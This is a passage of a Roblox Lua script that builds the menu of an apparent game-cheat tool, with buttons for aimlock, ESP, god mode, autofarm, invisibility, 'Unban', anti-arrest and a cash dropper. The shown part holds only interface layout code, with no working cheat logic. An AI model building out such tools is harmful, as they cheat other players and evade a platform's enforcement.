  614. LavaBase.BorderSizePixel = 0
  615. LavaBase.Position = UDim2.new(0.680955052, 0, 0.221326202, 0)
  616. LavaBase.Size = UDim2.new(0, 94, 0, 46)
  617. LavaBase.Font = Enum.Font.GothamBlack
  618. LavaBase.Text = "LavaBase"
  619. LavaBase.TextColor3 = Color3.fromRGB(255, 255, 255)
  620. LavaBase.TextSize = 14.000
  621.  
  622. SavePos.Name = "SavePos"
  623. SavePos.Parent = QuickTpFrame
  624. SavePos.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  625. SavePos.BorderSizePixel = 0
  626. SavePos.Position = UDim2.new(0.681183517, 0, 0.0399999991, 0)
  627. SavePos.Size = UDim2.new(0, 94, 0, 46)
  628. SavePos.Font = Enum.Font.GothamBlack
  629. SavePos.Text = "SavePos"
  630. SavePos.TextColor3 = Color3.fromRGB(255, 255, 255)
  631. SavePos.TextSize = 14.000
  632.  
  633. SafeZone2.Name = "SafeZone2"
  634. SafeZone2.Parent = QuickTpFrame
  635. SafeZone2.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  636. SafeZone2.BorderSizePixel = 0
  637. SafeZone2.Position = UDim2.new(0.677926719, 0, 0.762864709, 0)
  638. SafeZone2.Size = UDim2.new(0, 94, 0, 46)
  639. SafeZone2.Font = Enum.Font.GothamBlack
  640. SafeZone2.Text = "Safe Zone #2"
  641. SafeZone2.TextColor3 = Color3.fromRGB(255, 255, 255)
  642. SafeZone2.TextSize = 14.000
  643.  
  644. UFO.Name = "UFO"
  645. UFO.Parent = QuickTpFrame
  646. UFO.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  647. UFO.BorderSizePixel = 0
  648. UFO.Position = UDim2.new(0.677926719, 0, 0.590557039, 0)
  649. UFO.Size = UDim2.new(0, 94, 0, 46)
  650. UFO.Font = Enum.Font.GothamBlack
  651. UFO.Text = "UFO"
  652. UFO.TextColor3 = Color3.fromRGB(255, 255, 255)
  653. UFO.TextSize = 14.000
  654.  
  655. TacoShop.Name = "TacoShop"
  656. TacoShop.Parent = QuickTpFrame
  657. TacoShop.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  658. TacoShop.BorderSizePixel = 0
  659. TacoShop.Position = UDim2.new(0.351977378, 0, 0.590557039, 0)
  660. TacoShop.Size = UDim2.new(0, 94, 0, 46)
  661. TacoShop.Font = Enum.Font.GothamBlack
  662. TacoShop.Text = "TacoShop"
  663. TacoShop.TextColor3 = Color3.fromRGB(255, 255, 255)
  664. TacoShop.TextSize = 14.000
  665.  
  666. LoadPos.Name = "LoadPos"
  667. LoadPos.Parent = QuickTpFrame
  668. LoadPos.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  669. LoadPos.BorderSizePixel = 0
  670. LoadPos.Position = UDim2.new(0.355234176, 0, 0.0399999991, 0)
  671. LoadPos.Size = UDim2.new(0, 94, 0, 46)
  672. LoadPos.Font = Enum.Font.GothamBlack
  673. LoadPos.Text = "LoadPos"
  674. LoadPos.TextColor3 = Color3.fromRGB(255, 255, 255)
  675. LoadPos.TextSize = 14.000
  676.  
  677. GunShop1.Name = "GunShop1"
  678. GunShop1.Parent = QuickTpFrame
  679. GunShop1.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  680. GunShop1.BorderSizePixel = 0
  681. GunShop1.Position = UDim2.new(0.0221175179, 0, 0.409230769, 0)
  682. GunShop1.Size = UDim2.new(0, 94, 0, 46)
  683. GunShop1.Font = Enum.Font.GothamBlack
  684. GunShop1.Text = "GunShop(AK)"
  685. GunShop1.TextColor3 = Color3.fromRGB(255, 255, 255)
  686. GunShop1.TextSize = 14.000
  687.  
  688. SideScriptsFrame.Name = "SideScriptsFrame"
  689. SideScriptsFrame.Parent = Buttons
  690. SideScriptsFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  691. SideScriptsFrame.BackgroundTransparency = 1.000
  692. SideScriptsFrame.Size = UDim2.new(0, 316, 0, 325)
  693. SideScriptsFrame.Visible = false
  694.  
  695. Aimlock.Name = "Aimlock"
  696. Aimlock.Parent = SideScriptsFrame
  697. Aimlock.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  698. Aimlock.BorderSizePixel = 0
  699. Aimlock.Position = UDim2.new(0.0218890235, 0, 0.590557039, 0)
  700. Aimlock.Size = UDim2.new(0, 94, 0, 46)
  701. Aimlock.Font = Enum.Font.GothamBlack
  702. Aimlock.Text = "Aimlock"
  703. Aimlock.TextColor3 = Color3.fromRGB(255, 255, 255)
  704. Aimlock.TextSize = 14.000
  705.  
  706. Users.Name = "Users"
  707. Users.Parent = SideScriptsFrame
  708. Users.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  709. Users.BorderSizePixel = 0
  710. Users.Position = UDim2.new(0.0251458082, 0, 0.0399999991, 0)
  711. Users.Size = UDim2.new(0, 94, 0, 46)
  712. Users.Font = Enum.Font.GothamBlack
  713. Users.Text = "Users"
  714. Users.TextColor3 = Color3.fromRGB(255, 255, 255)
  715. Users.TextSize = 14.000
  716.  
  717. MoneyESP.Name = "MoneyESP"
  718. MoneyESP.Parent = SideScriptsFrame
  719. MoneyESP.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  720. MoneyESP.BorderSizePixel = 0
  721. MoneyESP.Position = UDim2.new(0.024917312, 0, 0.221326202, 0)
  722. MoneyESP.Size = UDim2.new(0, 94, 0, 46)
  723. MoneyESP.Font = Enum.Font.GothamBlack
  724. MoneyESP.Text = "MoneyESP"
  725. MoneyESP.TextColor3 = Color3.fromRGB(255, 255, 255)
  726. MoneyESP.TextSize = 14.000
  727.  
  728. FullGod.Name = "FullGod"
  729. FullGod.Parent = SideScriptsFrame
  730. FullGod.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  731. FullGod.BorderSizePixel = 0
  732. FullGod.Position = UDim2.new(0.0218890235, 0, 0.762864709, 0)
  733. FullGod.Size = UDim2.new(0, 94, 0, 46)
  734. FullGod.Font = Enum.Font.GothamBlack
  735. FullGod.Text = "FullGod"
  736. FullGod.TextColor3 = Color3.fromRGB(255, 255, 255)
  737. FullGod.TextSize = 14.000
  738.  
  739. Autofarm.Name = "Autofarm"
  740. Autofarm.Parent = SideScriptsFrame
  741. Autofarm.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  742. Autofarm.BorderSizePixel = 0
  743. Autofarm.Position = UDim2.new(0.351977378, 0, 0.762864709, 0)
  744. Autofarm.Size = UDim2.new(0, 94, 0, 46)
  745. Autofarm.Font = Enum.Font.GothamBlack
  746. Autofarm.Text = "Autofarm"
  747. Autofarm.TextColor3 = Color3.fromRGB(255, 255, 255)
  748. Autofarm.TextSize = 14.000
  749.  
  750. HighTool.Name = "HighTool"
  751. HighTool.Parent = SideScriptsFrame
  752. HighTool.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  753. HighTool.BorderSizePixel = 0
  754. HighTool.Position = UDim2.new(0.352205783, 0, 0.409230769, 0)
  755. HighTool.Size = UDim2.new(0, 94, 0, 46)
  756. HighTool.Font = Enum.Font.GothamBlack
  757. HighTool.Text = "High Tool"
  758. HighTool.TextColor3 = Color3.fromRGB(255, 255, 255)
  759. HighTool.TextSize = 14.000
  760.  
  761. Esp.Name = "Esp"
  762. Esp.Parent = SideScriptsFrame
  763. Esp.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  764. Esp.BorderSizePixel = 0
  765. Esp.Position = UDim2.new(0.355005682, 0, 0.221326202, 0)
  766. Esp.Size = UDim2.new(0, 94, 0, 46)
  767. Esp.Font = Enum.Font.GothamBlack
  768. Esp.Text = "Esp"
  769. Esp.TextColor3 = Color3.fromRGB(255, 255, 255)
  770. Esp.TextSize = 14.000
  771.  
  772. LastingBullets.Name = "LastingBullets"
  773. LastingBullets.Parent = SideScriptsFrame
  774. LastingBullets.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  775. LastingBullets.BorderSizePixel = 0
  776. LastingBullets.Position = UDim2.new(0.678155124, 0, 0.409230769, 0)
  777. LastingBullets.Size = UDim2.new(0, 94, 0, 46)
  778. LastingBullets.Font = Enum.Font.GothamBlack
  779. LastingBullets.Text = "LastingBullets"
  780. LastingBullets.TextColor3 = Color3.fromRGB(255, 255, 255)
  781. LastingBullets.TextSize = 14.000
  782.  
  783. GrenadeLock.Name = "GrenadeLock"
  784. GrenadeLock.Parent = SideScriptsFrame
  785. GrenadeLock.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  786. GrenadeLock.BorderSizePixel = 0
  787. GrenadeLock.Position = UDim2.new(0.680955052, 0, 0.221326202, 0)
  788. GrenadeLock.Size = UDim2.new(0, 94, 0, 46)
  789. GrenadeLock.Font = Enum.Font.GothamBlack
  790. GrenadeLock.Text = "GrenadeLock"
  791. GrenadeLock.TextColor3 = Color3.fromRGB(255, 255, 255)
  792. GrenadeLock.TextSize = 14.000
  793.  
  794. Spin.Name = "Spin"
  795. Spin.Parent = SideScriptsFrame
  796. Spin.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  797. Spin.BorderSizePixel = 0
  798. Spin.Position = UDim2.new(0.681183517, 0, 0.0399999991, 0)
  799. Spin.Size = UDim2.new(0, 94, 0, 46)
  800. Spin.Font = Enum.Font.GothamBlack
  801. Spin.Text = "Spin"
  802. Spin.TextColor3 = Color3.fromRGB(255, 255, 255)
  803. Spin.TextSize = 14.000
  804.  
  805. Unban.Name = "Unban"
  806. Unban.Parent = SideScriptsFrame
  807. Unban.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  808. Unban.BorderSizePixel = 0
  809. Unban.Position = UDim2.new(0.677926719, 0, 0.762864709, 0)
  810. Unban.Size = UDim2.new(0, 94, 0, 46)
  811. Unban.Font = Enum.Font.GothamBlack
  812. Unban.Text = "Unban"
  813. Unban.TextColor3 = Color3.fromRGB(255, 255, 255)
  814. Unban.TextSize = 14.000
  815.  
  816. TaserLock.Name = "TaserLock"
  817. TaserLock.Parent = SideScriptsFrame
  818. TaserLock.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  819. TaserLock.BorderSizePixel = 0
  820. TaserLock.Position = UDim2.new(0.677926719, 0, 0.590557039, 0)
  821. TaserLock.Size = UDim2.new(0, 94, 0, 46)
  822. TaserLock.Font = Enum.Font.GothamBlack
  823. TaserLock.Text = "TaserLock"
  824. TaserLock.TextColor3 = Color3.fromRGB(255, 255, 255)
  825. TaserLock.TextSize = 14.000
  826.  
  827. RpgLock.Name = "RpgLock"
  828. RpgLock.Parent = SideScriptsFrame
  829. RpgLock.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  830. RpgLock.BorderSizePixel = 0
  831. RpgLock.Position = UDim2.new(0.351977378, 0, 0.590557039, 0)
  832. RpgLock.Size = UDim2.new(0, 94, 0, 46)
  833. RpgLock.Font = Enum.Font.GothamBlack
  834. RpgLock.Text = "RpgLock"
  835. RpgLock.TextColor3 = Color3.fromRGB(255, 255, 255)
  836. RpgLock.TextSize = 14.000
  837.  
  838. Invisible.Name = "Invisible"
  839. Invisible.Parent = SideScriptsFrame
  840. Invisible.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  841. Invisible.BorderSizePixel = 0
  842. Invisible.Position = UDim2.new(0.355234176, 0, 0.0399999991, 0)
  843. Invisible.Size = UDim2.new(0, 94, 0, 46)
  844. Invisible.Font = Enum.Font.GothamBlack
  845. Invisible.Text = "Invisible"
  846. Invisible.TextColor3 = Color3.fromRGB(255, 255, 255)
  847. Invisible.TextSize = 14.000
  848.  
  849. InfTools.Name = "InfTools"
  850. InfTools.Parent = SideScriptsFrame
  851. InfTools.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  852. InfTools.BorderSizePixel = 0
  853. InfTools.Position = UDim2.new(0.0221175179, 0, 0.409230769, 0)
  854. InfTools.Size = UDim2.new(0, 94, 0, 46)
  855. InfTools.Font = Enum.Font.GothamBlack
  856. InfTools.Text = "InfTools"
  857. InfTools.TextColor3 = Color3.fromRGB(255, 255, 255)
  858. InfTools.TextSize = 14.000
  859.  
  860. TogglesFrame.Name = "TogglesFrame"
  861. TogglesFrame.Parent = Buttons
  862. TogglesFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  863. TogglesFrame.BackgroundTransparency = 1.000
  864. TogglesFrame.Size = UDim2.new(0, 316, 0, 325)
  865. TogglesFrame.Visible = false
  866.  
  867. QToTp.Name = "QToTp"
  868. QToTp.Parent = TogglesFrame
  869. QToTp.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  870. QToTp.BorderSizePixel = 0
  871. QToTp.Position = UDim2.new(0.0251458082, 0, 0.0399999991, 0)
  872. QToTp.Size = UDim2.new(0, 94, 0, 46)
  873. QToTp.Font = Enum.Font.GothamBlack
  874. QToTp.Text = "Q to TP"
  875. QToTp.TextColor3 = Color3.fromRGB(255, 255, 255)
  876. QToTp.TextSize = 14.000
  877.  
  878. QToTpColor.Name = "QToTpColor"
  879. QToTpColor.Parent = QToTp
  880. QToTpColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  881. QToTpColor.BorderSizePixel = 0
  882. QToTpColor.Size = UDim2.new(0, 93, 0, 5)
  883. QToTpColor.Font = Enum.Font.SourceSans
  884. QToTpColor.Text = ""
  885. QToTpColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  886. QToTpColor.TextSize = 14.000
  887.  
  888. HideBlock.Name = "HideBlock"
  889. HideBlock.Parent = TogglesFrame
  890. HideBlock.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  891. HideBlock.BorderSizePixel = 0
  892. HideBlock.Position = UDim2.new(0.024917312, 0, 0.221326202, 0)
  893. HideBlock.Size = UDim2.new(0, 94, 0, 46)
  894. HideBlock.Font = Enum.Font.GothamBlack
  895. HideBlock.Text = "Hide Block"
  896. HideBlock.TextColor3 = Color3.fromRGB(255, 255, 255)
  897. HideBlock.TextSize = 14.000
  898.  
  899. HideBlockColor.Name = "HideBlockColor"
  900. HideBlockColor.Parent = HideBlock
  901. HideBlockColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  902. HideBlockColor.BorderSizePixel = 0
  903. HideBlockColor.Size = UDim2.new(0, 93, 0, 5)
  904. HideBlockColor.Font = Enum.Font.SourceSans
  905. HideBlockColor.Text = ""
  906. HideBlockColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  907. HideBlockColor.TextSize = 14.000
  908.  
  909. HideUser.Name = "HideUser"
  910. HideUser.Parent = TogglesFrame
  911. HideUser.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  912. HideUser.BorderSizePixel = 0
  913. HideUser.Position = UDim2.new(0.0218890235, 0, 0.590557039, 0)
  914. HideUser.Size = UDim2.new(0, 94, 0, 46)
  915. HideUser.Font = Enum.Font.GothamBlack
  916. HideUser.Text = "Hide User"
  917. HideUser.TextColor3 = Color3.fromRGB(255, 255, 255)
  918. HideUser.TextSize = 14.000
  919.  
  920. HideUserColor.Name = "HideUserColor"
  921. HideUserColor.Parent = HideUser
  922. HideUserColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  923. HideUserColor.BorderSizePixel = 0
  924. HideUserColor.Size = UDim2.new(0, 93, 0, 5)
  925. HideUserColor.Font = Enum.Font.SourceSans
  926. HideUserColor.Text = ""
  927. HideUserColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  928. HideUserColor.TextSize = 14.000
  929.  
  930. AutoStomp.Name = "AutoStomp"
  931. AutoStomp.Parent = TogglesFrame
  932. AutoStomp.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  933. AutoStomp.BorderSizePixel = 0
  934. AutoStomp.Position = UDim2.new(0.0221175179, 0, 0.409230769, 0)
  935. AutoStomp.Size = UDim2.new(0, 94, 0, 46)
  936. AutoStomp.Font = Enum.Font.GothamBlack
  937. AutoStomp.Text = "Auto Stomp"
  938. AutoStomp.TextColor3 = Color3.fromRGB(255, 255, 255)
  939. AutoStomp.TextSize = 14.000
  940.  
  941. AutoStompColor.Name = "AutoStompColor"
  942. AutoStompColor.Parent = AutoStomp
  943. AutoStompColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  944. AutoStompColor.BorderSizePixel = 0
  945. AutoStompColor.Size = UDim2.new(0, 93, 0, 5)
  946. AutoStompColor.Font = Enum.Font.SourceSans
  947. AutoStompColor.Text = ""
  948. AutoStompColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  949. AutoStompColor.TextSize = 14.000
  950.  
  951. RocketRide.Name = "RocketRide"
  952. RocketRide.Parent = TogglesFrame
  953. RocketRide.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  954. RocketRide.BorderSizePixel = 0
  955. RocketRide.Position = UDim2.new(0.0218890235, 0, 0.762864709, 0)
  956. RocketRide.Size = UDim2.new(0, 94, 0, 46)
  957. RocketRide.Font = Enum.Font.GothamBlack
  958. RocketRide.Text = "Rocket Ride"
  959. RocketRide.TextColor3 = Color3.fromRGB(255, 255, 255)
  960. RocketRide.TextSize = 14.000
  961.  
  962. RocketRideColor.Name = "RocketRideColor"
  963. RocketRideColor.Parent = RocketRide
  964. RocketRideColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  965. RocketRideColor.BorderSizePixel = 0
  966. RocketRideColor.Size = UDim2.new(0, 93, 0, 5)
  967. RocketRideColor.Font = Enum.Font.SourceSans
  968. RocketRideColor.Text = ""
  969. RocketRideColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  970. RocketRideColor.TextSize = 14.000
  971.  
  972. AntiArrest.Name = "AntiArrest"
  973. AntiArrest.Parent = TogglesFrame
  974. AntiArrest.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  975. AntiArrest.BorderSizePixel = 0
  976. AntiArrest.Position = UDim2.new(0.352205783, 0, 0.409230769, 0)
  977. AntiArrest.Size = UDim2.new(0, 94, 0, 46)
  978. AntiArrest.Font = Enum.Font.GothamBlack
  979. AntiArrest.Text = "Anti-Arrest"
  980. AntiArrest.TextColor3 = Color3.fromRGB(255, 255, 255)
  981. AntiArrest.TextSize = 14.000
  982.  
  983. AntiArrestColor.Name = "AntiArrestColor"
  984. AntiArrestColor.Parent = AntiArrest
  985. AntiArrestColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  986. AntiArrestColor.BorderSizePixel = 0
  987. AntiArrestColor.Size = UDim2.new(0, 93, 0, 5)
  988. AntiArrestColor.Font = Enum.Font.SourceSans
  989. AntiArrestColor.Text = ""
  990. AntiArrestColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  991. AntiArrestColor.TextSize = 14.000
  992.  
  993. AntiGrab.Name = "AntiGrab"
  994. AntiGrab.Parent = TogglesFrame
  995. AntiGrab.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  996. AntiGrab.BorderSizePixel = 0
  997. AntiGrab.Position = UDim2.new(0.351977378, 0, 0.762864709, 0)
  998. AntiGrab.Size = UDim2.new(0, 94, 0, 46)
  999. AntiGrab.Font = Enum.Font.GothamBlack
  1000. AntiGrab.Text = "Anti-Grab"
  1001. AntiGrab.TextColor3 = Color3.fromRGB(255, 255, 255)
  1002. AntiGrab.TextSize = 14.000
  1003.  
  1004. AntiGrabColor.Name = "AntiGrabColor"
  1005. AntiGrabColor.Parent = AntiGrab
  1006. AntiGrabColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  1007. AntiGrabColor.BorderSizePixel = 0
  1008. AntiGrabColor.Size = UDim2.new(0, 93, 0, 5)
  1009. AntiGrabColor.Font = Enum.Font.SourceSans
  1010. AntiGrabColor.Text = ""
  1011. AntiGrabColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  1012. AntiGrabColor.TextSize = 14.000
  1013.  
  1014. AutoDrop.Name = "AutoDrop"
  1015. AutoDrop.Parent = TogglesFrame
  1016. AutoDrop.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1017. AutoDrop.BorderSizePixel = 0
  1018. AutoDrop.Position = UDim2.new(0.678155124, 0, 0.409230769, 0)
  1019. AutoDrop.Size = UDim2.new(0, 94, 0, 46)
  1020. AutoDrop.Font = Enum.Font.GothamBlack
  1021. AutoDrop.Text = "Auto Drop"
  1022. AutoDrop.TextColor3 = Color3.fromRGB(255, 255, 255)
  1023. AutoDrop.TextSize = 14.000
  1024.  
  1025. AutoDropColor.Name = "AutoDropColor"
  1026. AutoDropColor.Parent = AutoDrop
  1027. AutoDropColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  1028. AutoDropColor.BorderSizePixel = 0
  1029. AutoDropColor.Size = UDim2.new(0, 93, 0, 5)
  1030. AutoDropColor.Font = Enum.Font.SourceSans
  1031. AutoDropColor.Text = ""
  1032. AutoDropColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  1033. AutoDropColor.TextSize = 14.000
  1034.  
  1035. AntiStomp.Name = "AntiStomp"
  1036. AntiStomp.Parent = TogglesFrame
  1037. AntiStomp.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1038. AntiStomp.BorderSizePixel = 0
  1039. AntiStomp.Position = UDim2.new(0.355005682, 0, 0.221326202, 0)
  1040. AntiStomp.Size = UDim2.new(0, 94, 0, 46)
  1041. AntiStomp.Font = Enum.Font.GothamBlack
  1042. AntiStomp.Text = "Anti-Stomp"
  1043. AntiStomp.TextColor3 = Color3.fromRGB(255, 255, 255)
  1044. AntiStomp.TextSize = 14.000
  1045.  
  1046. AntiStompColor.Name = "AntiStompColor"
  1047. AntiStompColor.Parent = AntiStomp
  1048. AntiStompColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  1049. AntiStompColor.BorderSizePixel = 0
  1050. AntiStompColor.Size = UDim2.new(0, 93, 0, 5)
  1051. AntiStompColor.Font = Enum.Font.SourceSans
  1052. AntiStompColor.Text = ""
  1053. AntiStompColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  1054. AntiStompColor.TextSize = 14.000
  1055.  
  1056. AutoBlock.Name = "AutoBlock"
  1057. AutoBlock.Parent = TogglesFrame
  1058. AutoBlock.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1059. AutoBlock.BorderSizePixel = 0
  1060. AutoBlock.Position = UDim2.new(0.680955052, 0, 0.221326202, 0)
  1061. AutoBlock.Size = UDim2.new(0, 94, 0, 46)
  1062. AutoBlock.Font = Enum.Font.GothamBlack
  1063. AutoBlock.Text = "Auto Block"
  1064. AutoBlock.TextColor3 = Color3.fromRGB(255, 255, 255)
  1065. AutoBlock.TextSize = 14.000
  1066.  
  1067. AutoBlockColor.Name = "AutoBlockColor"
  1068. AutoBlockColor.Parent = AutoBlock
  1069. AutoBlockColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  1070. AutoBlockColor.BorderSizePixel = 0
  1071. AutoBlockColor.Size = UDim2.new(0, 93, 0, 5)
  1072. AutoBlockColor.Font = Enum.Font.SourceSans
  1073. AutoBlockColor.Text = ""
  1074. AutoBlockColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  1075. AutoBlockColor.TextSize = 14.000
  1076.  
  1077. CashAura.Name = "CashAura"
  1078. CashAura.Parent = TogglesFrame
  1079. CashAura.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1080. CashAura.BorderSizePixel = 0
  1081. CashAura.Position = UDim2.new(0.681183517, 0, 0.0399999991, 0)
  1082. CashAura.Size = UDim2.new(0, 94, 0, 46)
  1083. CashAura.Font = Enum.Font.GothamBlack
  1084. CashAura.Text = "Cash Aura"
  1085. CashAura.TextColor3 = Color3.fromRGB(255, 255, 255)
  1086. CashAura.TextSize = 14.000
  1087.  
  1088. CashAuraColor.Name = "CashAuraColor"
  1089. CashAuraColor.Parent = CashAura
  1090. CashAuraColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  1091. CashAuraColor.BorderSizePixel = 0
  1092. CashAuraColor.Size = UDim2.new(0, 93, 0, 5)
  1093. CashAuraColor.Font = Enum.Font.SourceSans
  1094. CashAuraColor.Text = ""
  1095. CashAuraColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  1096. CashAuraColor.TextSize = 14.000
  1097.  
  1098. AntiEffects.Name = "AntiEffects"
  1099. AntiEffects.Parent = TogglesFrame
  1100. AntiEffects.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1101. AntiEffects.BorderSizePixel = 0
  1102. AntiEffects.Position = UDim2.new(0.677926719, 0, 0.762864709, 0)
  1103. AntiEffects.Size = UDim2.new(0, 94, 0, 46)
  1104. AntiEffects.Font = Enum.Font.GothamBlack
  1105. AntiEffects.Text = "Anti-Effects"
  1106. AntiEffects.TextColor3 = Color3.fromRGB(255, 255, 255)
  1107. AntiEffects.TextSize = 14.000
  1108.  
  1109. AntiEffectsColor.Name = "AntiEffectsColor"
  1110. AntiEffectsColor.Parent = AntiEffects
  1111. AntiEffectsColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  1112. AntiEffectsColor.BorderSizePixel = 0
  1113. AntiEffectsColor.Size = UDim2.new(0, 93, 0, 5)
  1114. AntiEffectsColor.Font = Enum.Font.SourceSans
  1115. AntiEffectsColor.Text = ""
  1116. AntiEffectsColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  1117. AntiEffectsColor.TextSize = 14.000
  1118.  
  1119. AltArmor.Name = "AltArmor"
  1120. AltArmor.Parent = TogglesFrame
  1121. AltArmor.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1122. AltArmor.BorderSizePixel = 0
  1123. AltArmor.Position = UDim2.new(0.677926719, 0, 0.590557039, 0)
  1124. AltArmor.Size = UDim2.new(0, 94, 0, 46)
  1125. AltArmor.Font = Enum.Font.GothamBlack
  1126. AltArmor.Text = "Alt Armor"
  1127. AltArmor.TextColor3 = Color3.fromRGB(255, 255, 255)
  1128. AltArmor.TextSize = 14.000
  1129.  
  1130. AltArmorColor.Name = "AltArmorColor"
  1131. AltArmorColor.Parent = AltArmor
  1132. AltArmorColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  1133. AltArmorColor.BorderSizePixel = 0
  1134. AltArmorColor.Size = UDim2.new(0, 93, 0, 5)
  1135. AltArmorColor.Font = Enum.Font.SourceSans
  1136. AltArmorColor.Text = ""
  1137. AltArmorColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  1138. AltArmorColor.TextSize = 14.000
  1139.  
  1140. AntiBag.Name = "AntiBag"
  1141. AntiBag.Parent = TogglesFrame
  1142. AntiBag.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1143. AntiBag.BorderSizePixel = 0
  1144. AntiBag.Position = UDim2.new(0.351977378, 0, 0.590557039, 0)
  1145. AntiBag.Size = UDim2.new(0, 94, 0, 46)
  1146. AntiBag.Font = Enum.Font.GothamBlack
  1147. AntiBag.Text = "Anti-Bag"
  1148. AntiBag.TextColor3 = Color3.fromRGB(255, 255, 255)
  1149. AntiBag.TextSize = 14.000
  1150.  
  1151. AntiBagColor.Name = "AntiBagColor"
  1152. AntiBagColor.Parent = AntiBag
  1153. AntiBagColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  1154. AntiBagColor.BorderSizePixel = 0
  1155. AntiBagColor.Size = UDim2.new(0, 93, 0, 5)
  1156. AntiBagColor.Font = Enum.Font.SourceSans
  1157. AntiBagColor.Text = ""
  1158. AntiBagColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  1159. AntiBagColor.TextSize = 14.000
  1160.  
  1161. AntiSlow.Name = "AntiSlow"
  1162. AntiSlow.Parent = TogglesFrame
  1163. AntiSlow.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1164. AntiSlow.BorderSizePixel = 0
  1165. AntiSlow.Position = UDim2.new(0.355234176, 0, 0.0399999991, 0)
  1166. AntiSlow.Size = UDim2.new(0, 94, 0, 46)
  1167. AntiSlow.Font = Enum.Font.GothamBlack
  1168. AntiSlow.Text = "Anti-Slow"
  1169. AntiSlow.TextColor3 = Color3.fromRGB(255, 255, 255)
  1170. AntiSlow.TextSize = 14.000
  1171.  
  1172. AntiSlowColor.Name = "AntiSlowColor"
  1173. AntiSlowColor.Parent = AntiSlow
  1174. AntiSlowColor.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
  1175. AntiSlowColor.BorderSizePixel = 0
  1176. AntiSlowColor.Size = UDim2.new(0, 93, 0, 5)
  1177. AntiSlowColor.Font = Enum.Font.SourceSans
  1178. AntiSlowColor.Text = ""
  1179. AntiSlowColor.TextColor3 = Color3.fromRGB(255, 0, 0)
  1180. AntiSlowColor.TextSize = 14.000
  1181.  
  1182. SellingFrame.Name = "SellingFrame"
  1183. SellingFrame.Parent = Buttons
  1184. SellingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  1185. SellingFrame.BackgroundTransparency = 1.000
  1186. SellingFrame.Size = UDim2.new(0, 316, 0, 325)
  1187. SellingFrame.Visible = false
  1188.  
  1189. CashTextbox.Name = "CashTextbox"
  1190. CashTextbox.Parent = SellingFrame
  1191. CashTextbox.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1192. CashTextbox.BorderSizePixel = 0
  1193. CashTextbox.Position = UDim2.new(0.0949367061, 0, 0.212307692, 0)
  1194. CashTextbox.Size = UDim2.new(0, 257, 0, 34)
  1195. CashTextbox.Font = Enum.Font.SourceSans
  1196. CashTextbox.PlaceholderText = "INSERT MONEY AMOUNT"
  1197. CashTextbox.Text = ""
  1198. CashTextbox.TextColor3 = Color3.fromRGB(255, 255, 255)
  1199. CashTextbox.TextSize = 14.000
  1200.  
  1201. CashDropperTitle.Name = "CashDropperTitle"
  1202. CashDropperTitle.Parent = SellingFrame
  1203. CashDropperTitle.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
